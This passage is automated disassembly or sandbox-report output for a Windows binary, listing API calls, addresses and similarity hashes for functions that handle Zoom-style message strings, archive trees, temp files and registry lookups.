                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EC89
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECB7
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECF4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName), ref: 00C8ED24
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID), ref: 00C8ED90
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8), ref: 00C8EDAD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EDC0
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 6b5d3a34aac4b2a135ed0f55da0df0cc26ff8fb4841bdf7339aed951b48c96de
                • Instruction ID: f0878327ab7a095599d04159ea41fc2471eca91732fd8d0a1f1fdd3ace32d575
                • Opcode Fuzzy Hash: 6b5d3a34aac4b2a135ed0f55da0df0cc26ff8fb4841bdf7339aed951b48c96de
                • Instruction Fuzzy Hash: A6419C75E003099FCF14EFA4D8456DDBBB0AF48315F044119EC12AB391DB70AA8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A514
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A663
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: 425e00cd3f60ccbd1de29320b29965b622ac1482f5b435ffcff3265dbb17b1d4
                • Instruction ID: 086b40580d0a3fe55375da3e00366b0082e20c1dffa65f4840e64f3009323dcd
                • Opcode Fuzzy Hash: 425e00cd3f60ccbd1de29320b29965b622ac1482f5b435ffcff3265dbb17b1d4
                • Instruction Fuzzy Hash: 9141AE75D00608DFCF14EFA4D945ADDBBB4AF08315F044119E812A7395EB309A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90C48
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID:
                • API String ID: 1443623190-0
                • Opcode ID: e313330a1652eb35b117d1cd93ae4efe56f6fcca535a2e25949a10405ff427f0
                • Instruction ID: f19abb71748aa3157f4f13ee0adb0223b610c6bdcb8a0f462f10e58f85a99597
                • Opcode Fuzzy Hash: e313330a1652eb35b117d1cd93ae4efe56f6fcca535a2e25949a10405ff427f0
                • Instruction Fuzzy Hash: A2419C75D00208DFCF14EFA4D949ADDBBB4BF08315F144219E812AB381DB309A8ADBA5
                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D0E68B,00000000), ref: 00D0E505
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E50C
                  • Part of subcall function 00D0E5D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00D0E4F3,00000000,?,00D0E68B,00000000), ref: 00D0E5D9
                • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D0E68B,00000000), ref: 00D0E51C
                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00D0E543
                • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 00D0E557
                • InterlockedPopEntrySList.KERNEL32(00000000), ref: 00D0E56A
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D0E57D
                Similarity
                • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                • String ID:
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C6017D
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,?,00000000,?), ref: 00C601F5
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00D22BE0,00000000,00000000,?), ref: 00C60242
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C60272
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,000003FE,?), ref: 00C602EF
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0), ref: 00C60333
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00C6035C
                  • Part of subcall function 00C53EF0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,000000FF,?,00C53DA1,00000000), ref: 00C53F06
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                  • Part of subcall function 00C605E8: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00C5E6F0), ref: 00C605F7
                Similarity
                • API ID: Cmm@@$State@Unlock@$String$Assign@?$$?erase@?$DeallocateH_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                • String ID:
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E5B3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,00000034,00C5EC7A,00000000,?,00000024,00C5C31F), ref: 00C5E5EF
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C5E626
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000), ref: 00C5E669
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000001,?), ref: 00C5E68A
                • #140.MAPI32(?), ref: 00C5E6DE
                Similarity
                • API ID: Cmm@@State@Unlock@$#140H_prolog3_
                • String ID:
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA57C
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,00000001,000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA5F8
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,00000001,000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA616
                • ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(00000000,?,?,?,00000000,00000001,000000A8,000000A8,00000000), ref: 00CAA631
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000001,000000FF,00000000,?,?,?,00000000,00000001,000000A8,000000A8,00000000), ref: 00CAA65B
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(000000A8,000000A8,00000001,000000FF,?,?,00000001,000000FF,00000000,?,?,?,00000000,00000001,000000A8,000000A8), ref: 00CAA686
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(000000A8,000000A8,00000000,00000001,000000A8,00CAAC66), ref: 00CAA5CD
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Similarity
                • API ID: Cmm@@String$??0?$$U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Case@?$CompareDeallocateH_prolog3_V01@@
                • String ID:
                APIs
                • ?cmm_fs_tmppath@@YAPB_WXZ.RWSNDPQSKZ ref: 00C62C20
                  • Part of subcall function 00C62BC0: GetTempPathW.KERNEL32(00000104,00DFFC98), ref: 00C62BF7
                • GetCurrentProcessId.KERNEL32 ref: 00C62C65
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000001,00000080,00000000), ref: 00C62D15
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C62D2A
                • ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C62D4D
                  • Part of subcall function 00C617B0: CloseHandle.KERNEL32 ref: 00C617BF
                Similarity
                • API ID: Close@Cmm@@File@$?cmm_fs_tmppath@@CloseCreateCurrentFileHandlePathProcessTemp
                • String ID: %s%s%s%lx%lx.tmp
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAACA7
                • ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z.RWSNDPQSKZ(?,00000040,00CAAC8D,?,00000000), ref: 00CAACD4
                  • Part of subcall function 00CAA8D0: __EH_prolog3_GS.LIBCMT ref: 00CAA8DA
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000090), ref: 00CAA927
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA952
                  • Part of subcall function 00CAA8D0: ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA95F
                  • Part of subcall function 00CAA8D0: ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAAA4D
                  • Part of subcall function 00CAA8D0: ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA87
                  • Part of subcall function 00CAA8D0: ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA97
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAC2
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAE1
                • ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z.RWSNDPQSKZ(?,00000040,00CAAC8D,?,00000000), ref: 00CAACDF
                  • Part of subcall function 00CAA8D0: ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA9B3
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,-00000004,?,00000000,?), ref: 00CAA9F3
                  • Part of subcall function 00CAA8D0: ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA23
                  • Part of subcall function 00CAA8D0: ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA30
                  • Part of subcall function 00CAA8D0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAFE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD2F
                • ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(00000001,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD43
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?Append@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z.RWSNDPQSKZ(?,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAAD95
                • ??4FilePath@Cmm@@QAEAAV01@ABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,00000040,00CAAC8D,?,00000000), ref: 00CAADA1
                Similarity
                • API ID: Cmm@@$FilePath@String$V12@$Name@V01@@$??0?$$BaseCmm@@@std@@@std@@@Components@H_prolog3_V01@V?$_V?$allocator@V?$vector@$?rbegin@?$Append@Case@?$CompareCompare@?$DeallocateSimple_types@_String_const_iterator@String_val@U?$_V?$reverse_iterator@W@2@@W@std@@@std@@@std@@@std@@
                • String ID:
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E70D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,80000000,?,?,00000000,00000024,00C5EC9F,00000000,?,?,?,?,?,?,00000000), ref: 00C5E746
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00D34F88,00000000,?,?,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E792
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,80000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?,00000024), ref: 00C5E7D1
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00D34F88,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C5E806
                • #17.MAPI32(00000000,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E822
                • #17.MAPI32(00000000,?,?,?,?,?,00000000,?,00000024,00C5C31F), ref: 00C5E835
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3_
                • String ID:
                APIs
                • ?IsWrittenComplete@CmmInternelMsg@Cmm@@QAE_NXZ.RWSNDPQSKZ ref: 00CAC7CB
                  • Part of subcall function 00CABD80: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00CAC7D0), ref: 00CABD8B
                • _InternalDeleteHelper.LIBCONCRT ref: 00CAC7E3
                • GetLastError.KERNEL32(?,?,00000001,?,00CACB28,00000000,00000000), ref: 00CAC7F2
                • ?GetToWrite@CmmInternelMsg@Cmm@@QBEIXZ.RWSNDPQSKZ(?,?), ref: 00CAC847
                • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00CAC851
                • GetLastError.KERNEL32 ref: 00CAC85B
                • ?GetToWrite@CmmInternelMsg@Cmm@@QBEIXZ.RWSNDPQSKZ ref: 00CAC86A
                Similarity
                • API ID: Cmm@@$InternelMsg@$ErrorLastWrite@$Complete@DeleteFileHelperInternalState@Unlock@WriteWritten
                • String ID:
                APIs
                • GetCurrentProcess.KERNEL32(?,9FB8111D,00DEF0D0,00000000,00000000), ref: 00CDAC97
                • IsWow64Process.KERNEL32(00000000), ref: 00CDAC9E
                • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,20010002,00000000,?,00000800), ref: 00CDACFD
                Strings
                • ProgramFilesDir, xrefs: 00CDACEE
                • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00CDACF3
                Similarity
                • API ID: Process$CurrentValueWow64
                • String ID: ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEECE
                • ??0LogFilterItem_s@logging@@QAE@XZ.RWSNDPQSKZ(?,?,00000080,00CBF405,?,?,?), ref: 00CBEF1F
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,00000080,00CBF405,?,?,?), ref: 00CBEF55
                  • Part of subcall function 00CBF839: _Deallocate.LIBCONCRT ref: 00CBF8FE
                • ?IsValid@LogFilterItem_s@logging@@QBE_NXZ.RWSNDPQSKZ(?,?,00000080,00CBF405,?,?,?), ref: 00CBEF68
                • ??0LogFilterItem_s@logging@@QAE@ABU01@@Z.RWSNDPQSKZ(00000002,?,?,00000080,00CBF405,?,?,?), ref: 00CBEF75
                • ??1LogFilterItem_s@logging@@QAE@XZ.RWSNDPQSKZ(?,?,00000002,?,?,00000080,00CBF405,?,?,?), ref: 00CBEFC7
                • ??4LogFilterItem_s@logging@@QAEAAU01@ABU01@@Z.RWSNDPQSKZ(?,?,?,00000080,00CBF405,?,?,?), ref: 00CBEFE0
                Similarity
                • API ID: FilterItem_s@logging@@$U01@@$Assign@?$Cmm@@DeallocateH_prolog3_StringU01@Valid@
                • String ID:
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAADE7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAADFA
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE0B
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB78F
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB7B8
                • ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000008,00CAA957,?), ref: 00CAAE27
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE89
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE9B
                Similarity
                • API ID: Cmm@@$FilePath@$String$Internal@Separator@SeparatorsStripTrailing$??0?$?find_last_of@?$Assign@?$H_prolog3V01@@
                • String ID:
                APIs
                • DeleteFileW.KERNEL32(?), ref: 00C6281E
                • GetTempPathW.KERNEL32(00000207,?), ref: 00C62834
                • GetTempFileNameW.KERNEL32(?,00D34CD0,00000000,?), ref: 00C62848
                • DeleteFileW.KERNEL32(?), ref: 00C62855
                • MoveFileW.KERNEL32(?,?), ref: 00C62863
                • DeleteFileW.KERNEL32(?), ref: 00C62874
                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00C62888
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: File$Delete$MoveTemp$NamePath
                • String ID:
                • API String ID: 3002589313-0
                APIs
                  • Part of subcall function 00D0827F: _free.LIBCMT ref: 00D082A4
                • _free.LIBCMT ref: 00D08581
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D0858C
                • _free.LIBCMT ref: 00D08597
                • _free.LIBCMT ref: 00D085EB
                • _free.LIBCMT ref: 00D085F6
                • _free.LIBCMT ref: 00D08601
                • _free.LIBCMT ref: 00D0860C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB2071
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB2083
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB208C
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB2098
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ ref: 00CB20B3
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ ref: 00CB20BD
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB20C9
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@Equal@Node@tinyxml2@@Pair@tinyxml2@@State@Str@StringUnlock@Util@tinyxml2@@Value@
                • String ID:
                • API String ID: 1383704807-0
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5A98D
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C5A997
                • int.LIBCPMT ref: 00C5A9AE
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C5A9E8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C59009,?,?,?,00000000,?,00000054,00C5748B,?,?,?,?,?), ref: 00C5A9F5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C5AA08
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5AA15
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Cmm@@Concurrency::cancel_current_taskFacet_H_prolog3RegisterState@Unlock@
                • String ID:
                • API String ID: 3531389548-0
                APIs
                • __EH_prolog3.LIBCMT ref: 00C66A4C
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C66A56
                • int.LIBCPMT ref: 00C66A6D
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C66AA7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C65279,00000001,?,00000000,00000001,00000010,00C62E91), ref: 00C66AB4
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C66AC7
